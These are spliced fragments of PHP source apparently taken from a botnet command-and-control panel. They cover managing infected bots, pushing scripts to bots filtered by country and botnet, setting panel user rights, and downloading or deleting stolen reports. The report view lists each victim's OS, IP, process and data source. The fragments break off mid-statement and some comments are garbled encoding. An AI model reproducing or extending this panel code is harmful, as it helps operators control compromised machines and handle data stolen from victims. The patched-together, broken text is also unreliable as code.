/////////////////////////////////////////////////////////////////////////////////////////////////// if ((!empty($_GET['botsaction']) || !empty($_POST['botsaction'])) && (!empty($_POST['bots']) && is_array($_POST['bots']) || !empty($_GET['bots']) && is_array($_GET['bots']))) { $bedit = empty($userData['r_edit_bots']) ? 0 : 1; $ba = !empty($_GET['botsaction']) ? $_GET['botsaction'] : $_POST['botsaction']; $blist = !empty($_POST['bots']) && is_array($_POST['bots']) ? $_POST['bots'] : $_GET['bots']; $blist = array_unique($blist); //Проверям есть ли право на действие. $deny = true; foreach ($botMenu as $item) { if ($item[0] !== 0 && strcmp($item[0], $ba) === 0) { $deny = false; break; } } if ($deny) { ThemeFatalError(LNG_ACCESS_DEFINED); } //Составляем список ботов для MySQL. $sqlBlist = ''; $count = 0; foreach ($blist as $bot) { $sqlBlist .= ($count++ == 0 ? '' : ' OR ') . "`bot_id`='" . addslashes($bot) . "'"; } if (strcmp($ba, 'fullinfo') === 0 || strcmp($ba, 'fullinfoss') === 0) { // makefavorite if (isset($_REQUEST['makefavorite'])) { $botIdQ = mysql_real_escape_string($_REQUEST['bots'][0]); mysql_query('UPDATE `botnet_list` SET `favorite`=IF(`favorite`=0, 1, 0) WHERE `bot_id`="' . $botIdQ . '";'); echo mysql_result(mysql_query('SELECT `favorite` FROM `botnet_list` WHERE `bot_id`="' . $botIdQ . '";'), 0, 0); die; }
//Получаем данные скрипта. if (count($errors) > 0) { $f_name = htmlEntitiesEx($_POST['name']); $f_is_enabled = $_POST['status'] > 0 ? true : false; $f_limit = intval($_POST['limit']); $f_bots = htmlEntitiesEx($_POST['bots']); $f_botnets = htmlEntitiesEx($_POST['botnets']); $f_countries = htmlEntitiesEx($_POST['countries']); $f_context = htmlEntitiesEx($_POST['context']); } else { if ($is_view || $_GET['new'] != -1) { if (!($r = mysqlQueryEx('botnet_scripts', 'SELECT name, flag_enabled, send_limit, bots_wl, bots_bl, botnets_wl, botnets_bl, countries_wl, countries_bl, script_text, extern_id FROM botnet_scripts WHERE id=\'' . addslashes($is_view ? $_GET['view'] : $_GET['new']) . '\' LIMIT 1'))) { ThemeMySQLError(); } if (!($m = @mysql_fetch_row($r))) { ThemeFatalError(LNG_BOTNET_SCRIPT_E1, 0, 0, 0); } $f_name = htmlEntitiesEx($m[0]); $f_is_enabled = $m[1] > 0 ? true : false; $f_limit = intval($m[2]); $f_bots = htmlEntitiesEx(SQLListToExp($m[3], $m[4])); $f_botnets = htmlEntitiesEx(SQLListToExp($m[5], $m[6])); $f_countries = htmlEntitiesEx(SQLListToExp($m[7], $m[8])); $f_context = htmlEntitiesEx($m[9]); if (!$is_view) { $f_name = 'Copy of ' . $f_name; } } else { $f_name = 'script_' . CURRENT_TIME; $f_is_enabled = true; $f_limit = 0;
if (count($errors) > 0) { $formName = htmlEntitiesEx($_POST['name']); $formEnabled = $_POST['status'] > 0 ? true : false; $formComment = htmlEntitiesEx($_POST['comment']); foreach ($rights as $k => &$v) { if (isset($_POST[$k]) && $_POST[$k] > 0) { $v = 1; } } } else { if ($isEdit || $_GET['new'] != -1) { if (!($r = mysqlQueryEx('cp_users', 'SELECT * FROM cp_users WHERE id=\'' . addslashes($isEdit ? $_GET['edit'] : $_GET['new']) . '\' LIMIT 1'))) { ThemeMySQLError(); } if (!($m = @mysql_fetch_assoc($r))) { ThemeFatalError(LNG_SYS_USER_E1, 0, 0, 0); } $formName = htmlEntitiesEx($m['name']); $formEnabled = $m['flag_enabled'] > 0 ? true : false; $formComment = htmlEntitiesEx($m['comment']); foreach ($rights as $k => &$v) { if (isset($m[$k]) && $m[$k] > 0) { $v = 1; } } if (!$isEdit) { $formName = 'Copy of ' . $formName; } } else { $formName = 'user_' . CURRENT_TIME; $formEnabled = true;
$_FILTER['path'] .= ($_FILTER['path'] == '' ? '' : '/') . $_GET['sub']; } if (pathUpLevelExists($_FILTER['path'])) { die('WOW!'); } $_CUR_PATH = $_FILTER['path'] == '' ? $config['reports_path'] : $config['reports_path'] . '/' . $_FILTER['path']; /////////////////////////////////////////////////////////////////////////////////////////////////// // Загрузка файла. /////////////////////////////////////////////////////////////////////////////////////////////////// if (isset($_GET['file'])) { if (pathUpLevelExists($_GET['file'])) { die('SUPER WOW!'); } $fl = $_CUR_PATH . '/' . $_GET['file']; if (!@file_exists($fl) || !@is_file($fl)) { ThemeFatalError('File not exists.'); } httpDownloadHeaders(urldecode(baseNameEx($_GET['file'])), @filesize($fl)); echo @file_get_contents($fl); die; } /////////////////////////////////////////////////////////////////////////////////////////////////// // Создание архива/Удаление файлов. /////////////////////////////////////////////////////////////////////////////////////////////////// if (isset($_POST['filesaction']) && is_numeric($_POST['filesaction']) && !empty($_POST['files']) && is_array($_POST['files'])) { foreach ($_POST['files'] as $file) { if (pathUpLevelExists($file)) { die('PUPER WOW!'); } } //Удаление файлов.
$sub_url = QUERY_STRING_HTML . '&t=' . htmlEntitiesEx(urlencode($_GET['t'])) . '&id=' . htmlEntitiesEx(urlencode($_GET['id'])); //RџSЂRѕRІRμSЂSЏRμRј C ReRї RѕS, C ‡ RμS, P °. $context = ''; if ($m[14] == BLT_FILE || $m[14] == BLT_UNKNOWN) { if (($file = baseNameEx($m[16])) == '') { $file = 'file'; } $context = str_replace(array('{URL}', '{TEXT}'), array($sub_url . '&download=1', sprintf(LNG_REPORTS_VIEW_DOWNLOAD, htmlEntitiesEx($file), numberFormatAsInt($m[15]))), THEME_LIST_ANCHOR); $context = str_replace(array('{WIDTH}', '{TEXT}'), array('1%', THEME_STRING_SPACE), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $context), THEME_LIST_ITEM_LTEXT_U2); } else { $r = mysqlQueryEx($tbl, "SELECT context FROM {$tbl} WHERE {$tbl}.id='" . addslashes($_GET['id']) . "' LIMIT 1"); if (!$r) { ThemeMySQLError(); } if (@mysql_affected_rows() != 1 || !($cc = @mysql_fetch_row($r))) { ThemeFatalError(LNG_REPORTS_VIEW_NOT_EXISTS); } $context = str_replace(array('{COLUMNS_COUNT}', '{WIDTH}', '{TEXT}'), array(2, '100%', htmlEntitiesEx($cc[0])), THEME_LIST_ITEM_PLAIN_U1); } //R'S <RІRѕRґ. $data = str_replace('{WIDTH}', '100%', THEME_LIST_BEGIN) . str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(2, sprintf(LNG_REPORTS_VIEW_TITLE2, bltToLng($m[14]), numberFormatAsInt($m[15]))), THEME_LIST_TITLE) . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_BOTID), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', botPopupMenu($m[0], 'botmenu')), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_BOTNET), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[1])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_VERSION), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', intToVersion($m[2])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_OS), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', osDataToString($m[3])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_OSLANG), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[4])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TIME), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx(gmdate(LNG_FORMAT_DT, $m[5] + $m[6]))), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TIMEBIAS), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', timeBiasToText($m[6])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TICK), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', tickCountToText($m[7] / 1000)), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_RTIME), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx(gmdate(LNG_FORMAT_DT, $m[8]))), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_COUNTRY), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[9])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_IPV4), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[10])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_COMMENT), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[17]) ? '-' : htmlEntitiesEx($m[17])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_USED), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $m[18] == 1 ? LNG_YES : LNG_NO), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_PROCNAME), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[11]) ? '-' : htmlEntitiesEx($m[11])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_PROCUSER), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[12]) ? '-' : htmlEntitiesEx($m[12])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_SOURCE), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[13]) ? '-' : htmlEntitiesEx($m[13])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . $context . THEME_LIST_ROW_END; themeSmall(LNG_REPORTS_VIEW_TITLE, $data . THEME_LIST_END, 0, getBotJsMenu('botmenu'), 0); die; } ////////////////////////////////////////////////// / / /////////////////////////////////////////////// // RћRїSЂRμRґRμR "SЏRμRј RґR ° RЅRЅS <Rμ RґR" SЏ with "Pepsi" SЊS, SЂR °. ////////////////////////////////////////////////// / / /////////////////////////////////////////////// //RџSЂRe RґRѕR ± P ° RІR "RμRЅReRe RЅRѕRІS <C ... RїR ° ° SЂR RјRμS, SЂRѕRІ RЅSѓR ¶ RЅRѕ SѓRЅReS ‡ C RѕR ¶ P ° C SЊ RЅRμ RЅSѓR ¶ RЅS <Rμ RґR" SЏ js: datelist. $filter['date1'] = isset($_GET['date1']) ? intval($_GET['date1']) : 0; $filter['date2'] = isset($_GET['date2']) ? intval($_GET['date2']) : 0; if ($filter['date1'] > $filter['date2']) {